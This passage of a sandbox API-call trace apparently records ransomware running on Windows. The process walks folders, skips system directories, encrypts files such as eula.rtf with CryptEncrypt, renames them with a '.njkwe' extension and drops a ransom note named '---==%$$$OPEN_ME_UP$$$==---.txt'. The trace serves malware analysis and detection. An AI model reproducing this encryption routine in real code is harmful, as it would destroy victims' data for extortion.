hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0060.676] FindNextFileW (in: hFindFile=0xc1a2a0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0060.676] FindClose (in: hFindFile=0xc1a2a0 | out: hFindFile=0xc1a2a0) returned 1 [0060.676] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1028\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 62 [0060.676] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1028\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\588bce7c90097ed212\\1028\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0060.677] WriteFile (in: hFile=0x428, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f7ec*=0x351, lpOverlapped=0x0) returned 1 [0060.677] CloseHandle (hObject=0x428) returned 1 [0060.678] GetProcessHeap () returned 0xbe0000 [0060.678] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0060.678] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="1029", cAlternateFileName="")) returned 1 [0060.678] lstrcmpiW (lpString1="1029", lpString2="Windows") returned -1 [0060.678] lstrcmpiW (lpString1="1029", lpString2="$Recycle.bin") returned 1 [0060.678] lstrcmpiW (lpString1="1029", lpString2="System Volume Information") returned -1 [0060.678] lstrcmpiW (lpString1="1029", lpString2="Program Files") returned -1 [0060.678] lstrcmpiW (lpString1="1029", lpString2="Program Files (x86)") returned -1 [0060.678] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1029") returned 30 [0060.678] lstrcmpW (lpString1="1029", lpString2=".") returned 1 [0060.678] lstrcmpW (lpString1="1029", lpString2="..") returned 1 [0060.678] lstrcmpW (lpString1="\\\\?\\C:\\588bce7c90097ed212\\1029", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0060.678] GetProcessHeap () returned 0xbe0000 [0060.678] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0060.678] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1029\\*") returned 32 [0060.678] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1029\\*", lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc19e60 [0060.679] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0060.679] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0060.679] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0060.679] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0060.679] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0060.679] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1029\\.") returned 32 [0060.679] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.679] FindNextFileW (in: hFindFile=0xc19e60, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0060.679] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0060.679] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0060.679] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0060.679] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0060.679] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0060.679] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1029\\..") returned 33 [0060.679] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0060.679] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.679] FindNextFileW (in: hFindFile=0xc19e60, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xe8e, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0060.679] lstrcmpiW (lpString1="eula.rtf", lpString2="Windows") returned -1 [0060.679] lstrcmpiW (lpString1="eula.rtf", lpString2="$Recycle.bin") returned 1 [0060.679] lstrcmpiW (lpString1="eula.rtf", lpString2="System Volume Information") returned -1 [0060.679] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files") returned -1 [0060.679] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files (x86)") returned -1 [0060.679] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1029\\eula.rtf") returned 39 [0060.679] StrStrIW (lpFirst="eula.rtf", lpSrch=".njkwe") returned 0x0 [0060.679] lstrcmpW (lpString1="eula.rtf", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0060.679] lstrcmpW (lpString1="eula.rtf", lpString2="taridd") returned -1 [0060.679] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1029\\eula.rtf", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0060.679] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1029\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1029\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0060.680] GetTickCount () returned 0x114f9a3 [0060.680] GetTickCount () returned 0x114f9a3 [0060.680] GetTickCount () returned 0x114f9a3 [0060.680] GetTickCount () returned 0x114f9a3 [0060.680] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0060.680] GetProcessHeap () returned 0xbe0000 [0060.680] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0060.680] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesRead=0x380f7e4*=0xe8e, lpOverlapped=0x0) returned 1 [0060.682] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xfffff172, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0060.682] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0xe8e, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0xe8e, lpOverlapped=0x0) returned 1 [0060.682] GetProcessHeap () returned 0xbe0000 [0060.682] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0060.682] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.682] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0060.682] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0060.682] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0060.682] CloseHandle (hObject=0x42c) returned 1 [0060.683] GetProcessHeap () returned 0xbe0000 [0060.683] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0060.683] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1029\\eula.rtf_r00t_{3sXlE5}.njkwe") returned 59 [0060.683] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1029\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1029\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1029\\eula.rtf_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\1029\\eula.rtf_r00t_{3sxle5}.njkwe")) returned 1 [0060.685] GetProcessHeap () returned 0xbe0000 [0060.685] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0060.685] FindNextFileW (in: hFindFile=0xc19e60, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x13c4a, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0060.685] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Windows") returned -1 [0060.685] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="$Recycle.bin") returned 1 [0060.685] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="System Volume Information") returned -1 [0060.685] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files") returned -1 [0060.685] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files (x86)") returned -1 [0060.685] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1029\\LocalizedData.xml") returned 48 [0060.685] StrStrIW (lpFirst="LocalizedData.xml", lpSrch=".njkwe") returned 0x0 [0060.685] lstrcmpW (lpString1="LocalizedData.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0060.685] lstrcmpW (lpString1="LocalizedData.xml", lpString2="taridd") returned -1 [0060.685] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1029\\LocalizedData.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0060.685] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1029\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1029\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0060.685] GetTickCount () returned 0x114f9a3 [0060.685] GetTickCount () returned 0x114f9a3 [0060.685] GetTickCount () returned 0x114f9a3 [0060.685] GetTickCount () returned 0x114f9a3 [0060.685] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0060.686] GetProcessHeap () returned 0xbe0000 [0060.686] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0060.686] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesRead=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0060.687] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0060.688] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0060.688] GetProcessHeap () returned 0xbe0000 [0060.688] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0060.688] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.688] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0060.688] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0060.688] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0060.688] CloseHandle (hObject=0x42c) returned 1 [0060.690] GetProcessHeap () returned 0xbe0000 [0060.690] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0060.690] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1029\\LocalizedData.xml_r00t_{3sXlE5}.njkwe") returned 68 [0060.690] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1029\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1029\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1029\\LocalizedData.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\1029\\localizeddata.xml_r00t_{3sxle5}.njkwe")) returned 1 [0060.691] GetProcessHeap () returned 0xbe0000 [0060.691] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0060.691] FindNextFileW (in: hFindFile=0xc19e60, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0060.691] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Windows") returned -1 [0060.691] lstrcmpiW (lpString1="SetupResources.dll", lpString2="$Recycle.bin") returned 1 [0060.691] lstrcmpiW (lpString1="SetupResources.dll", lpString2="System Volume Information") returned -1 [0060.691] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files") returned 1 [0060.691] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files (x86)") returned 1 [0060.691] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1029\\SetupResources.dll") returned 49 [0060.691] StrStrIW (lpFirst="SetupResources.dll", lpSrch=".njkwe") returned 0x0 [0060.691] lstrcmpW (lpString1="SetupResources.dll", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0060.691] lstrcmpW (lpString1="SetupResources.dll", lpString2="taridd") returned -1 [0060.691] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1029\\SetupResources.dll", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0060.691] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1029\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1029\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0060.692] GetTickCount () returned 0x114f9b3 [0060.692] GetTickCount () returned 0x114f9b3 [0060.692] GetTickCount () returned 0x114f9b3 [0060.692] GetTickCount () returned 0x114f9b3 [0060.692] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0060.692] GetProcessHeap () returned 0xbe0000 [0060.692] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0060.692] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesRead=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0060.694] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0060.694] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0060.694] GetProcessHeap () returned 0xbe0000 [0060.694] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0060.694] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.694] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0060.694] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0060.694] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0060.694] CloseHandle (hObject=0x42c) returned 1 [0060.695] GetProcessHeap () returned 0xbe0000 [0060.695] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0060.695] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1029\\SetupResources.dll_r00t_{3sXlE5}.njkwe") returned 69 [0060.695] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1029\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1029\\setupresources.dll"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1029\\SetupResources.dll_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\1029\\setupresources.dll_r00t_{3sxle5}.njkwe")) returned 1 [0060.696] GetProcessHeap () returned 0xbe0000 [0060.696] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0060.696] FindNextFileW (in: hFindFile=0xc19e60, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0060.696] FindClose (in: hFindFile=0xc19e60 | out: hFindFile=0xc19e60) returned 1 [0060.696] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1029\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 62 [0060.696] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1029\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\588bce7c90097ed212\\1029\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0060.696] WriteFile (in: hFile=0x428, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f7ec*=0x351, lpOverlapped=0x0) returned 1 [0060.697] CloseHandle (hObject=0x428) returned 1 [0060.697] GetProcessHeap () returned 0xbe0000 [0060.697] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0060.697] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="1030", cAlternateFileName="")) returned 1 [0060.697] lstrcmpiW (lpString1="1030", lpString2="Windows") returned -1 [0060.697] lstrcmpiW (lpString1="1030", lpString2="$Recycle.bin") returned 1 [0060.697] lstrcmpiW (lpString1="1030", lpString2="System Volume Information") returned -1 [0060.697] lstrcmpiW (lpString1="1030", lpString2="Program Files") returned -1 [0060.697] lstrcmpiW (lpString1="1030", lpString2="Program Files (x86)") returned -1 [0060.697] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1030") returned 30 [0060.697] lstrcmpW (lpString1="1030", lpString2=".") returned 1 [0060.697] lstrcmpW (lpString1="1030", lpString2="..") returned 1 [0060.697] lstrcmpW (lpString1="\\\\?\\C:\\588bce7c90097ed212\\1030", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0060.697] GetProcessHeap () returned 0xbe0000 [0060.697] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0060.698] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1030\\*") returned 32 [0060.698] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1030\\*", lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a3a0 [0060.698] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0060.698] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0060.698] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0060.698] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0060.698] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0060.698] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1030\\.") returned 32 [0060.698] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.698] FindNextFileW (in: hFindFile=0xc1a3a0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, 